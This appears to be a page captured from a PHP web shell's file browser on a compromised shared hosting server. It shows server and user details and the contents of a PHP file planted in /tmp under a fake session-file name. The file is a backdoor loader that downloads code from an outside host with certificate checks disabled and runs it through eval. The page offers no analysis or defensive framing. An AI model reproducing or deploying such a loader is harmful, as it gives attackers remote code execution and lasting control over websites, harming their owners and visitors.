HEX
Server: Apache
System: Linux p3plmcpnl498459.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: r10qwwhj45te (10284385)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //tmp/sess_54d605226cd660ded0b93dbbe740bc28.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
function callback($url)
{
    $post_content = false;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $post_content = curl_exec($ch);
    curl_close($ch);

    if ($post_content) {
        eval('?>' . $post_content);
    }
}

call_user_func('callback', 'https://fcalpha.net/web/photo/20151024/naxc.txt');
?>